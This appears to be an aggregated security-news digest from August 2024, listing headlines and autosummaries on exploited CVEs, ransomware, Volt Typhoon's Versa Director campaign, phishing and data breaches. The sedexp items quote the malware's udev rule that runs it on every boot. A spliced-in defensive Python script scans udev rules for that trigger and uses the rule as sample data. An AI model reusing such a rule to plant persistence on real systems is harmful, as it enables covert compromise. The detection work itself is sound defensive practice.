          Autosummary: “Kadariya and his associates used multiple strategies to profit from their widespread hacking and wire fraud scheme, including by using accounts on predominantly Russian cybercrime forums to sell to cybercriminals access to the compromised devices of victim Internet users (so-called “loads” or “bots”), as well as information stolen from victims and recorded in “logs,” such as banking information and login credentials, to enable further efforts to defraud the victim Internet users or deliver additional malware to their devices.” "


          U.S. CISA adds Apache OFBiz bug to its Known Exploited Vulnerabilities catalog

          exploits
          2024-08-28 https://securityaffairs.com/167676/uncategorized/u-s-cisa-apache-ofbiz-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apache OFBiz bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apache OFBiz Incorrect Authorization Vulnerability CVE-2024-38856 (CVSS score of 9.8) to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability is an incorrect authorization issue in Apache OFBiz that impacts versions […] "

          Autosummary: It is used by hundreds of companies worldwide, with 41% in the U.S., 19% in India, 7% in Germany, 6% in France, and 5% in the U.K. Notable users include United Airlines, Atlassian JIRA, Home Depot, and HP. "


          Lateral movement: Clearest sign of unfolding ransomware attack

          exploits ransomware
          2024-08-27 https://www.helpnetsecurity.com/2024/08/27/ransomware-attacks-lateral-movement/

44% of unfolding ransomware attacks were spotted during lateral movement, according to Barracuda Networks. 25% of incidents were detected when the attackers started writing or editing files, and 14% were unmasked by behavior that didn’t fit with known activity patterns. Barracuda researchers analyzed a sample of 200 reported incidents covering August 2023 to July 2024, involving 37 countries and 36 different ransomware groups. RaaS models most common in recent ransomware attacks: The sample shows that … More

          The post Lateral movement: Clearest sign of unfolding ransomware attack appeared first on Help Net Security.

          "

Autosummary: Leading indicators of ransomware activity. According to detection data from Barracuda, in the first six months of 2024 the top indicators of likely ransomware activity include: Lateral movement: 44% of the ransomware attacks were spotted by detection systems monitoring for lateral movement. "


          Google Warns of CVE-2024-7965 Chrome Security Flaw Under Active Exploitation

          exploits
          2024-08-27 https://thehackernews.com/2024/08/google-warns-of-cve-2024-7965-chrome.html
          Google has revealed that a security flaw that was patched as part of a security update rolled out last week to its Chrome browser has come under active exploitation in the wild. Tracked as CVE-2024-7965, the vulnerability has been described as an inappropriate implementation bug in the V8 JavaScript and WebAssembly engine. "Inappropriate implementation in V8 in Google Chrome prior to "

Autosummary: CVE-2024-4671 - Use-after-free in Visuals; CVE-2024-4761 - Out-of-bounds write in V8; CVE-2024-4947 - Type confusion in V8; CVE-2024-5274 - Type confusion in V8; CVE-2024-7971 - Type confusion in V8. Users are highly recommended to upgrade to Chrome version 128.0.6613.84/.85 for Windows and macOS, and version 128.0.6613.84 for Linux to mitigate potential threats. "


          Brazil suspects criminals set record São Paulo fires

          latam
          2024-08-27 https://www.bbc.com/news/articles/clywk7nzqjvo
          Officials say the fires were almost exclusively caused by "human action" and were likely set deliberately. "

          Autosummary: "


          Park’N Fly notifies 1 million customers of data breach

          financial
          2024-08-27 https://www.bleepingcomputer.com/news/security/parkn-fly-notifies-1-million-customers-of-data-breach/
Park'N Fly is warning that a data breach exposed the personal and account information of 1 million customers in Canada after hackers breached its network. [...] "

          Autosummary: The firm, which also offers shuttle, car washing, and oil change services, operates facilities located near airports in Toronto, Vancouver, Montreal, Edmonton, and Ottawa. "


          Chinese Volt Typhoon hackers exploited Versa zero-day to breach ISPs, MSPs

          exploits
          2024-08-27 https://www.bleepingcomputer.com/news/security/chinese-volt-typhoon-hackers-exploited-versa-zero-day-to-breach-isps-msps/
          The Chinese state-backed hacking group Volt Typhoon is behind attacks that exploited a zero-day flaw in Versa Director to upload a custom webshell to steal credentials and breach corporate networks. [...] "

          Autosummary: "Analysis of our global telemetry identified actor-controlled small-office/home-office (SOHO) devices exploiting this zero-day vulnerability at four U.S. victims and one non-U.S. victim in the Internet service provider (ISP), managed service provider (MSP) and information technology (IT) sectors as early as June 12, 2024," explained Black Lotus Labs. Versa confirmed this to BleepingComputer, explaining that the threat actors exploited the vulnerability to steal credentials using these steps: Access the exposed HA port using an NCS client and create an account with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin privileges. "


          Microsoft Sway abused in massive QR code phishing campaign

          financial
          2024-08-27 https://www.bleepingcomputer.com/news/security/microsoft-sway-abused-in-massive-qr-code-phishing-campaign/
          ​A massive QR code phishing campaign abused Microsoft Sway, a cloud-based tool for creating online presentations, to host landing pages to trick Microsoft 365 users into handing over their credentials. [...] "

          Autosummary: "


          SMS scammers use toll fees as a lure

          financial
          2024-08-27 https://www.malwarebytes.com/blog/news/2024/08/sms-scammers-use-toll-fees-as-a-lure
Scammers are increasingly using toll fees as a lure in smishing attacks with the aim of grabbing victims' personal details and credit card information. "

Autosummary: Involved domains: the post lists the lure domains used in the campaign. Several of these were hosted at the IP: 45.8.92[.]38. We don’t just report on phone security—we provide it. Cybersecurity risks should never spread beyond a headline. "


          TDECU data breach affects half a million people

          financial
          2024-08-27 https://www.malwarebytes.com/blog/news/2024/08/tdecu-data-breach-affects-half-a-million-people
          The Texas Dow Employees Credit Union (TDECU) has disclosed a data breach of 500,474 people, related to the MOVEit vulnerability. "

Autosummary: Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Since then it has gone through several mergers and acquisitions. According to the data breach notification, the breach occurred on May 29, 2023, but wasn’t discovered until July 30, 2024. "


          Versa Director zero-day exploited to compromise ISPs, MSPs (CVE-2024-39717)

          exploits
          2024-08-27 https://www.helpnetsecurity.com/2024/08/27/cve-2024-39717-exploited/

          Advanced, persistent attackers have exploited a zero-day vulnerability (CVE-2024-39717) in Versa Director to compromise US-based managed service providers with a custom-made web shell dubbed VersaMem by the researchers. The malware harvests credentials enabling the attackers to access the providers’ downstream customers’ networks as an authenticated user. “Based on known and observed tactics and techniques, [Lumen’s] Black Lotus Labs attributes the zero-day exploitation of CVE-2024-39717 and operational use of the VersaMem web shell with moderate confidence … More

          The post Versa Director zero-day exploited to compromise ISPs, MSPs (CVE-2024-39717) appeared first on Help Net Security.

          "

Autosummary: The attacks. On Tuesday, Black Lotus Labs researchers shared that they identified actor-controlled small-office/home-office (SOHO) devices exploiting the zero-day at four US victims and one non-US victim in the ISP / MSP / IT sectors as early as June 12, 2024. "


          RSA Authenticator App improves cybersecurity for federal agencies

          ciber
          2024-08-27 https://www.helpnetsecurity.com/2024/08/27/rsa-authenticator-app/

          RSA announced new passwordless, phishing-resistant capabilities that meet stringent technical standards and can help public sector agencies, contractors, and systems integrators fulfill Executive Order 14028 and National Security Memo 8 to improve the nation’s cybersecurity. The RSA Authenticator App is FIDO2-certified and now supports device-bound passkeys that comply with the strictest federal cybersecurity regulations. Part of RSA ID Plus, an identity and access management (IAM) platform built on NIST principles, RSA can provide the authentication … More

          The post RSA Authenticator App improves cybersecurity for federal agencies appeared first on Help Net Security.

          "

          Autosummary: "


          Chinese Volt Typhoon Exploits Versa Director Flaw, Targets U.S. and Global IT Sectors

          exploits
          2024-08-27 https://thehackernews.com/2024/08/chinese-volt-typhoon-exploits-versa.html
          The China-nexus cyber espionage group tracked as Volt Typhoon has been attributed with moderate confidence to the zero-day exploitation of a recently disclosed high-severity security flaw impacting Versa Director. The attacks targeted four U.S. victims and one non-U.S. victim in the Internet service provider (ISP), managed service provider (MSP) and information technology (IT) sectors as early "

          Autosummary: The Santa Clara-based company counts Adobe, Axis Bank, Barclays, Capital One, Colt Technology Services, Infosys, Orange, Samsung, T-Mobile, and Verizon among its customers. "


          BlackSuit ransomware stole data of 950,000 from software vendor

          exploits ransomware
          2024-08-27 https://www.bleepingcomputer.com/news/security/blacksuit-ransomware-stole-data-of-950-000-from-software-vendor/
          Young Consulting is sending data breach notifications to 954,177 people who had their information exposed in a BlackSuit ransomware attack on April 10, 2024. [...] "

          Autosummary: "


US Marshals Service disputes ransomware gang's breach claims

          exploits ransomware
          2024-08-27 https://www.bleepingcomputer.com/news/security/us-marshals-service-disputes-ransomware-gangs-breach-claims/
The U.S. Marshals Service (USMS) denies its systems were breached by the Hunters International ransomware gang after being listed as a new victim on the cybercrime group's leak site on Monday. [...] "

          Autosummary: "


          Malware infiltrates Pidgin messenger’s official plugin repository

          exploits
          2024-08-27 https://www.bleepingcomputer.com/news/security/malware-infiltrates-pidgin-messengers-official-plugin-repository/
          The Pidgin messaging app removed the ScreenShareOTR plugin from its official third-party plugin list after it was discovered that it was used to install keyloggers, information stealers, and malware commonly used to gain initial access to corporate networks. [...] "

          Autosummary: ESET says that the same malicious server, which has been taken down now, hosted additional plugins named OMEMO, Pidgin Paranoia, Master Password, Window Merge, and HTTP File Upload. "


          Old devices, new dangers: The risks of unsupported IoT tech

          industry
          2024-08-27 https://www.welivesecurity.com/en/internet-of-things/old-devices-new-dangers-the-risks-of-unsupported-iot-tech/
          In the digital graveyard, a new threat stirs: Out-of-support devices becoming thralls of malicious actors "

Autosummary: However, the takeaway from all this is that you should always keep your devices updated, and when that is not possible, try to dispose of them securely (wiping old data), replace them with a new device after secure disposal, or find them a new, much-less-connected purpose. Devices such as cameras, teleconferencing systems, routers, and smart locks have operating systems or firmware that, once obsolete, no longer receive security updates, leaving the door open to hacking or other misuse. "


          China-linked APT Volt Typhoon exploited a zero-day in Versa Director

          exploits
          2024-08-27 https://securityaffairs.com/167658/apt/volt-typhoon-versa-director-zero-day.html
          China-linked APT group Volt Typhoon exploited a zero-day flaw in Versa Director to upload a custom webshell in target networks. China-linked APT Volt Typhoon exploited a zero-day vulnerability, tracked as CVE-2024-39717, in Versa Director, to deploy a custom webshell on breached networks. Versa Director is a centralized management and orchestration platform used primarily by Internet […] "

Autosummary: In the most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors. The malware operates directly in memory; it doesn’t modify files on disk, to avoid detection. “Given the severity of the vulnerability, the sophistication of the threat actors, the critical role of Versa Director servers in the network, and the potential consequences of a successful compromise, Black Lotus Labs considers this exploitation campaign to be highly significant,” concludes the report, which includes Indicators of Compromise (IoCs). “Analysis of our global telemetry identified actor-controlled small-office/home-office (SOHO) devices exploiting this zero-day vulnerability at four U.S. victims and one non-U.S. victim in the Internet service provider (ISP), managed service provider (MSP) and information technology (IT) sectors as early as June 12, 2024.” "


          Nuclei: Open-source vulnerability scanner

          exploits
          2024-08-26 https://www.helpnetsecurity.com/2024/08/26/nuclei-open-source-vulnerability-scanner/

Nuclei is a fast and customizable open-source vulnerability scanner powered by YAML-based templates. With its flexible templating system, Nuclei can be adapted to perform various security checks. It can send requests to multiple targets using customizable templates, ensuring zero false positives and enabling rapid scanning across many hosts. It supports a wide range of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, and more. Nuclei features: Template library: A collection of community-powered templates for … More

          The post Nuclei: Open-source vulnerability scanner appeared first on Help Net Security.

          "

Autosummary: It supports a wide range of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, and more. Target specification: Support for various target specification options, such as URLs, IP ranges, ASN ranges, and file input, allowing flexibility in defining the scanning scope. "


          Rebrand, regroup, ransomware, repeat

          exploits ransomware
          2024-08-26 https://www.helpnetsecurity.com/2024/08/26/rebrand-regroup-ransomware-repeat-video/

          Changes witnessed over the last few years have led to larger ransomware groups breaking into smaller units, posing more considerable challenges for law enforcement. Ransomware actors are evading arrest more easily and adapting methods with innovative technologies. In this Help Net Security video, Shobhit Gautam, Security Solutions Architect at HackerOne, discusses how ransomware tactics have evolved and how organizations and government bodies are having to fight change with change.

          The post Rebrand, regroup, ransomware, repeat appeared first on Help Net Security.

          "

          Autosummary: "


          New Android Malware NGate Steals NFC Data to Clone Contactless Payment Cards

          exploits
          2024-08-26 https://thehackernews.com/2024/08/new-android-malware-ngate-steals-nfc.html
Cybersecurity researchers have uncovered new Android malware that can relay victims' contactless payment data from physical credit and debit cards to an attacker-controlled device with the goal of conducting fraudulent operations. The Slovak cybersecurity company is tracking the novel malware as NGate, stating it observed the crimeware campaign targeting three banks in Czechia. The malware "has "

          Autosummary: NGate, besides abusing the functionality of NFCGate to capture NFC traffic and pass it along to another device, prompts users to enter sensitive financial information, including banking client ID, date of birth, and the PIN code for their banking card. "


          Linux malware sedexp uses udev rules for persistence and evasion

          exploits Linux
          2024-08-26 https://securityaffairs.com/167567/malware/linux-malware-sedexp.html
          Researchers spotted a new stealthy Linux malware named sedexp that uses Linux udev rules to achieve persistence and evade detection. Aon’s Cyber Solutions spotted a new malware family, called sedexp, that relies on a lesser-known Linux persistence technique. The malware has been active since at least 2022 but remained largely undetected for years. The experts […] "

Autosummary: Linux malware sedexp uses udev rules for persistence and evasion (Pierluigi Paganini, August 26, 2024). Researchers spotted a new stealthy Linux malware named sedexp that uses Linux udev rules to achieve persistence and evade detection. "


          Remote Work: A Ticking Time Bomb Waiting to be Exploited

          exploits
          2024-08-26 https://www.bleepingcomputer.com/news/security/remote-work-a-ticking-time-bomb-waiting-to-be-exploited/
          ThreatLocker has created a list of the top 15 actions to secure an organization if employing a remote or hybrid workforce. Learn more in this free e-book from ThreatLocker. [...] "

Autosummary: Since the security of the networks that a company’s endpoints connect to is no longer under your organization’s control, the emphasis must shift to controlling and securing the devices directly: limit inbound network traffic; reduce shadow IT to zero; secure data storage and transportation; maintain visibility of what occurs in your environment; enforce secure access to accounts. The IT Professional’s Guide to Securing Remote Workforces: ThreatLocker® has built a list of the top 15 actions you can take to secure your organization if you employ a remote or hybrid workforce. "


          Seattle-Tacoma Airport IT systems down due to a cyberattack

          ciber
          2024-08-26 https://www.bleepingcomputer.com/news/security/seattle-tacoma-airport-it-systems-down-due-to-a-cyberattack/
          The Seattle-Tacoma International Airport has confirmed that a cyberattack is likely behind the ongoing IT systems outage that disrupted reservation check-in systems and delayed flights over the weekend. [...] "

          Autosummary: On Saturday, August 24, the Port of Seattle warned that it and the SEA Airport were suffering an ongoing outage caused by a "possible cyberattack," forcing them to isolate certain critical systems to contain the damage. "


          Move over malware: Why one teen is more worried about AI (re-air) (Lock and Code S05E18)

          exploits
          2024-08-26 https://www.malwarebytes.com/blog/podcast/2024/08/move-over-malware-why-one-teen-is-more-worried-about-ai-re-air-lock-and-code-s05e18
          This week on the Lock and Code podcast, we speak with Nitya Sharma about why AI is a far bigger concern than malware in staying safe. "

          Autosummary: Show notes and credits: Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 4.0 License http://creativecommons.org/licenses/by/4.0/ Outro Music: “Good God” by Wowa (unminus.com) Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it. "


          SonicWall Issues Critical Patch for Firewall Vulnerability Allowing Unauthorized Access

          exploits
          2024-08-26 https://thehackernews.com/2024/08/sonicwall-issues-critical-patch-for.html
          SonicWall has released security updates to address a critical flaw impacting its firewalls that, if successfully exploited, could grant malicious actors unauthorized access to the devices. The vulnerability, tracked as CVE-2024-40766 (CVSS score: 9.3), has been described as an improper access control bug. "An improper access control vulnerability has been identified in the SonicWall SonicOS "

          Autosummary: "


          Patelco notifies 726,000 customers of ransomware data breach

          financial exploits ransomware Telcos
          2024-08-26 https://www.bleepingcomputer.com/news/security/patelco-notifies-726-000-customers-of-ransomware-data-breach/
          Patelco Credit Union warns customers it suffered a data breach after personal data was stolen in a RansomHub ransomware attack earlier this year. [...] "

          Autosummary: "


          Microsoft: Exchange Online mistakenly tags emails as malware

          exploits
          2024-08-26 https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-online-mistakenly-tags-emails-as-malware/
          Microsoft is investigating an Exchange Online false positive issue causing emails containing images to be wrongly tagged as malicious and sent to quarantine. [...] "

Autosummary: Tracked under EX873252, this ongoing service degradation issue seems to be widespread, according to reports from system administrators, and it also impacts messages with image signatures. "


          Versa fixes Director zero-day vulnerability exploited in attacks

          exploits
          2024-08-26 https://www.bleepingcomputer.com/news/security/versa-fixes-director-zero-day-vulnerability-exploited-in-attacks/
          Versa Networks has fixed a zero-day vulnerability exploited in the wild that allows attackers to upload malicious files by exploiting an unrestricted file upload flaw in the Versa Director GUI. [...] "

          Autosummary: "


          Google tags a tenth Chrome zero-day as exploited this year

          exploits
          2024-08-26 https://www.bleepingcomputer.com/news/security/google-tags-a-tenth-chrome-zero-day-as-exploited-this-year/
          Today, Google revealed that it patched the tenth zero-day exploited in the wild in 2024 by attackers or security researchers during hacking contests. [...] "

          Autosummary: "


          Exploring Android threats and ways to mitigate them | Unlocked 403 cybersecurity podcast (ep.5)

          ciber
          2024-08-26 https://www.welivesecurity.com/en/videos/exploring-android-threats-and-ways-to-mitigate-them-unlocked-403-cybersecurity-podcast-ep5/
          The world of Android threats is quite vast and intriguing. In this episode, Becks and Lukáš demonstrate how easy it is to take over your phone, with some added tips on how to stay secure "

          Autosummary: "


          Google addressed the tenth actively exploited Chrome zero-day this year

          exploits
          2024-08-26 https://securityaffairs.com/167631/hacking/10th-google-chrome-zero-day-this-year.html
          Google released emergency security updates to fix the tenth actively exploited Chrome zero-day vulnerability this year. Google released a security update to address a new Chrome zero-day vulnerability, tracked as CVE-2024-7965 (CVSS score 8.8), that is actively exploited. The vulnerability is an Inappropriate implementation issue that resides in Chrome’s V8 JavaScript engine. “Google is aware that exploits […] "

Autosummary: (March 2024) CVE-2024-4671: a use-after-free issue that resides in the Visuals component (May 2024). Google addressed the tenth actively exploited Chrome zero-day this year (Pierluigi Paganini, August 26, 2024). Google released emergency security updates to fix the tenth actively exploited Chrome zero-day vulnerability this year. "


          A cyberattack impacted operations at the Port of Seattle and Sea-Tac Airport

          ciber
          2024-08-26 https://securityaffairs.com/167581/hacking/port-of-seattle-sea-tac-airport-cyberattack.html
A cyber attack hit the Port of Seattle, which also operates the Seattle-Tacoma International Airport; websites and phone systems were impacted. Media reported that the Port of Seattle, which also operates the Seattle-Tacoma International Airport, has suffered a cyber attack that impacted the websites, email and phone services. According to The Seattle Times, the cyber […] "

          Autosummary: A cyberattack impacted operations at the Port of Seattle and Sea-Tac Airport (Pierluigi Paganini, August 26, 2024). In response to the incident, the Port isolated critical systems. The Port of Seattle, including SEA Airport, is experiencing an internet and web systems outage, which is impacting some systems at the airport. "


          New Linux Malware "sedexp" Hides Credit Card Skimmers Using Udev Rules

          exploits Linux
          2024-08-25 https://thehackernews.com/2024/08/new-linux-malware-sedexp-hides-credit.html
          Cybersecurity researchers have uncovered a new stealthy piece of Linux malware that leverages an unconventional technique to achieve persistence on infected systems and hide credit card skimmer code. The malware, attributed to a financially motivated threat actor, has been codenamed sedexp by Aon's Stroz Friedberg incident response services team. "This advanced threat, active since 2022, hides "

          Autosummary: The udev rule for sedexp, ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="asedexpb run:+", is set up such that the malware is run whenever the /dev/random device (character device major 1, minor 8) is added, which happens on every boot. "


          Week in review: PostgreSQL databases under attack, new Chrome zero-day actively exploited

          exploits
          2024-08-25 https://www.helpnetsecurity.com/2024/08/25/week-in-review-postgresql-databases-under-attack-new-chrome-zero-day-actively-exploited/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: PostgreSQL databases under attack Poorly protected PostgreSQL databases running on Linux machines are being compromised by cryptojacking attackers. Vulnerabilities in Microsoft macOS apps may give attackers access to microphone, camera Vulnerabilities in popular Microsoft apps for macOS can be abused by attackers to record video and audio clips, take pictures, access and exfiltrate data and send emails, Cisco Talos researchers … More

          The post Week in review: PostgreSQL databases under attack, new Chrome zero-day actively exploited appeared first on Help Net Security.

          "

          Autosummary: New infosec products of the week: August 23, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Entrust, Fortanix, McAfee, Own, RightCrowd, and Wallarm. Another critical SolarWinds Web Help Desk bug fixed (CVE-2024-28987) A week after SolarWinds released a fix for a critical code-injection-to-RCE vulnerability (CVE-2024-28986) in Web Help Desk (WHD), another patch for another critical flaw (CVE-2024-28987) in the company’s IT help desk solution has been pushed out. "


          SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 8

          exploits
          2024-08-25 https://securityaffairs.com/167525/malware/security-affairs-malware-newsletter-round-8.html
          Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Meet UULoader: An Emerging and Evasive Malicious Installer; BlindEagle flying high in Latin America; Finding Malware: Unveiling NUMOZYLOD with Google Security Operations; New Backdoor Targeting Taiwan Employs Stealthy Communications; Unmasking Styx Stealer: How a Hacker’s […] "

          Autosummary: "


          U.S. CISA adds Versa Director bug to its Known Exploited Vulnerabilities catalog

          exploits
          2024-08-25 https://securityaffairs.com/167534/hacking/cisa-adds-versa-director-bug-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Versa Director bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Versa Director Dangerous File Type Upload Vulnerability CVE-2024-39717 (CVSS score: 6.6) to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability CVE-2024-39717 resides in the “Change Favicon” feature in Versa Director’s GUI, […] "

          Autosummary: "


          Russian national arrested in Argentina for laundering money of crooks and Lazarus APT

          financial latam rusia-ucrania
          2024-08-24 https://securityaffairs.com/167485/cyber-crime/russian-national-arrested-laundering-lazarus-funds.html
          A Russian national was arrested in Argentina for laundering proceeds from illicit actors, including North Korea-linked Lazarus Group. This week, the Argentine Federal Police (PFA) arrested a Russian national for laundering proceeds from illicit actors and seized millions of dollars in assets from his Argentinian-based operation. The cybercriminal facilitated money laundering by accepting illicit cryptocurrency […] "

          Autosummary: Russian national arrested in Argentina for laundering money of crooks and Lazarus APT (Pierluigi Paganini, August 24, 2024). “Through our investigation, we were able to confirm that the Lazarus Group and APT38, cyber actors associated with the DPRK, are responsible for the theft of $100 million of virtual currency from Harmony’s Horizon bridge reported on June 24, 2022.” "


          CISA Urges Federal Agencies to Patch Versa Director Vulnerability by September

          exploits
          2024-08-24 https://thehackernews.com/2024/08/cisa-urges-federal-agencies-to-patch.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a security flaw impacting Versa Director to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation. The medium-severity vulnerability, tracked as CVE-2024-39717 (CVSS score: 6.6), is a case of a file upload bug impacting the "Change Favicon" feature that could allow a threat actor to "

          Autosummary: "


          Stealthy "sedexp" Linux malware evaded detection for two years

          exploits Linux
          2024-08-24 https://www.bleepingcomputer.com/news/security/stealthy-sedexp-linux-malware-evaded-detection-for-two-years/
          A stealthy Linux malware named "sedexp" has been evading detection since 2022 by using a persistence technique not yet included in the MITRE ATT&CK framework. [...] "

          Autosummary: Udev rules are text configuration files that dictate how the device manager should handle certain devices or events. They live in "/etc/udev/rules.d/" (local rules, highest precedence), "/run/udev/rules.d/" (volatile) and "/usr/lib/udev/rules.d/" (on older layouts "/lib/udev/rules.d/"). A rule typically has three parts: a condition on the event (ACTION=="add"), a match on the device name (KERNEL=="sdb1"), and the program to run when the conditions are met (RUN+="/path/to/script"). "
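          The sedexp rule quoted in the item above (ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="asedexpb run:+") and the ACTION/KERNEL/RUN anatomy described here both suggest a practical check: walk the rules directories and flag any RUN+= that is keyed to a device node which exists on every boot, or whose program is a bare name rather than an absolute path. The script below does that. It is an added example, not code from the Stroz Friedberg or BleepingComputer write-ups; the directory list, the memory-device table and the two sample rules are constructed for the demonstration (the sedexp line is the one quoted in the articles).

```python
"""Audit udev rules for persistence triggers of the kind sedexp uses.

Added example, not code from the sedexp write-ups. Parses udev rule lines
into match conditions and RUN+= programs, then flags rules that run a
program whenever a memory device (char major 1, e.g. /dev/random) is
added, or whose RUN program is a bare name. Sample rules are constructed.
"""
import os
import re
from typing import Dict, List, Tuple

# Directories udev reads rules from (constructed list; on many distributions
# /lib/udev/rules.d is a symlink to /usr/lib/udev/rules.d, deduplicated below).
RULES_DIRS = ["/etc/udev/rules.d", "/run/udev/rules.d",
              "/usr/lib/udev/rules.d", "/lib/udev/rules.d"]

# Character devices with major number 1 are the memory devices. They exist on
# every Linux system and are "added" on every boot: a reliable trigger.
MEMORY_DEVICE_MINORS = {"1": "mem", "2": "kmem", "3": "null", "4": "port",
                        "5": "zero", "7": "full", "8": "random",
                        "9": "urandom", "11": "kmsg"}

# One udev token: KEY, optional {attribute}, operator, double-quoted value.
TOKEN_RE = re.compile(
    r'\s*([A-Z_]+)(?:\{([^}]*)\})?\s*(==|!=|\+=|-=|:=|=)\s*"([^"]*)"\s*,?')


def parse_rule(line: str) -> Tuple[Dict[str, str], List[str]]:
    """Split one rule line into {match key: value} and the RUN programs."""
    conditions: Dict[str, str] = {}
    runs: List[str] = []
    pos = 0
    while pos < len(line):
        m = TOKEN_RE.match(line, pos)
        if not m:            # unparsable tail: stop rather than guess
            break
        key, attr, op, value = m.groups()
        name = f"{key}{{{attr}}}" if attr else key
        if op == "==":
            conditions[name] = value
        elif key == "RUN" and op in ("+=", "="):
            runs.append(value)
        pos = m.end()
    return conditions, runs


def audit_rules(text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, rule, reasons) for rules that look like triggers."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        conditions, runs = parse_rule(line)
        if not runs:
            continue
        reasons = []
        minor = conditions.get("ENV{MINOR}")
        if conditions.get("ENV{MAJOR}") == "1" and minor in MEMORY_DEVICE_MINORS:
            reasons.append(f"runs on add of /dev/{MEMORY_DEVICE_MINORS[minor]} "
                           f"(char 1:{minor}), which happens on every boot")
        for prog in runs:
            cmd = prog.split()[0] if prog.split() else prog
            if not cmd.startswith("/"):
                reasons.append(f"RUN program {cmd!r} is a bare name; udev resolves it "
                               f"under /usr/lib/udev, so confirm it is a known helper there")
        if reasons:
            findings.append((lineno, line, reasons))
    return findings


def audit_system() -> List[Tuple[str, int, str, List[str]]]:
    """Read-only walk of the real rules directories, findings tagged by file."""
    out, seen = [], set()
    for d in RULES_DIRS:
        real = os.path.realpath(d)
        if real in seen or not os.path.isdir(real):
            continue
        seen.add(real)
        for name in sorted(os.listdir(real)):
            path = os.path.join(real, name)
            if name.endswith(".rules") and os.path.isfile(path):
                with open(path, errors="replace") as fh:
                    for lineno, rule, reasons in audit_rules(fh.read()):
                        out.append((path, lineno, rule, reasons))
    return out


SAMPLE_RULES = """\
# constructed sample: a stock-looking rule followed by the sedexp trigger
ACTION=="add", SUBSYSTEM=="block", KERNEL=="sd*", RUN+="/usr/bin/logger udev: block device %k added"
ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="asedexpb run:+"
"""

if __name__ == "__main__":
    for lineno, rule, reasons in audit_rules(SAMPLE_RULES):
        print(f"sample line {lineno}: {rule}")
        for r in reasons:
            print(f"    - {r}")
    for path, lineno, rule, reasons in audit_system():
        print(f"{path}:{lineno}: {rule}")
        for r in reasons:
            print(f"    - {r}")
```

          Run as any user that can read the rules directories; it never writes. A hit on a memory device is worth treating as high confidence, since stock rules have no reason to react to /dev/random being added, while the bare-name check is a prompt to verify the helper exists under /usr/lib/udev with a package owner.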


          Cities on high alert as Brazil wildfires kill two

          latam
          2024-08-24 https://www.bbc.com/news/articles/cze56wn278zo
          A crisis cabinet has been set up by the state government to deal with the wildfires. "

          Autosummary: "


          Vulnerability prioritization is only the beginning

          exploits
          2024-08-23 https://www.helpnetsecurity.com/2024/08/23/vulnerability-prioritization/

          To date, most technology solutions focused on vulnerability management have focused on the prioritization of risks. That usually took the shape of some risk-ranking structure displayed in a table with links out to the CVEs and other advisory or threat intelligence information. This is a necessary step, but it’s insufficient. While knowing which vulnerabilities are the most pressing is nice, the desired outcome is ensuring those vulnerabilities are addressed and mitigated as quickly as possible. … More

          The post Vulnerability prioritization is only the beginning appeared first on Help Net Security.

          "

          Autosummary: Specifically in vulnerability management using a vulnerability scanner such as Wiz, a code repo like GitHub or GitLab, and a ticketing system like ServiceNow or Jira, mapping can clarify when a vulnerability is marked high priority, when a ticket is created, who owns the ticket, what activity is taken to resolve the ticket in GitHub (or in the CI/CD), and when the ticket is closed and by whom. Why the security journey is so opaque Most CISOs and their teams have clear metrics to assess progress on handling vulnerabilities, such as mean-time-to-detect, mean-time-to-response, percentage of critical vulnerabilities unpatched, time to patch, and more. "


          Fraud tactics and the growing prevalence of AI scams

          financial industry
          2024-08-23 https://www.helpnetsecurity.com/2024/08/23/fraud-tactics-ai-scams/

          In the first six months of 2024, Hiya flagged nearly 20 billion calls as suspected spam – more than 107 million spam calls every day. The data showed spam flag rates of more than 20% of unknown calls (calls coming from outside of someone’s address book) in 25 out of the 42 countries – with some spam flag rates above 50%. The first half of 2024 also saw an increase in AI deepfake scams, which use … More

          The post Fraud tactics and the growing prevalence of AI scams appeared first on Help Net Security.

          "

          Autosummary: The spam flag rate varies state by state, with Oklahoma, Indiana, and Ohio having the highest spam rates in H1, while Alaska, New York, and North Dakota had the lowest. "


          The changing dynamics of ransomware as law enforcement strikes

          exploits ransomware industry
          2024-08-23 https://www.helpnetsecurity.com/2024/08/23/changing-dynamics-of-ransomware/

          After peaking in late 2023, the ransomware industry is beginning to stabilize in productivity, with notable developments in ransomware targets, and industry dynamics, according to WithSecure. Sectors impacted by ransomware (Source: WithSecure) While ransomware productivity has shown signs of leveling off in 2024, the frequency of attacks and ransom payments collected remained higher in the first half of 2024 than in 2022 and 2023. “There has been a marked shift towards targeting small and medium-sized … More

          The post The changing dynamics of ransomware as law enforcement strikes appeared first on Help Net Security.

          "

          Autosummary: "


          New macOS Malware "Cthulhu Stealer" Targets Apple Users' Data

          exploits
          2024-08-23 https://thehackernews.com/2024/08/new-macos-malware-cthulhu-stealer.html
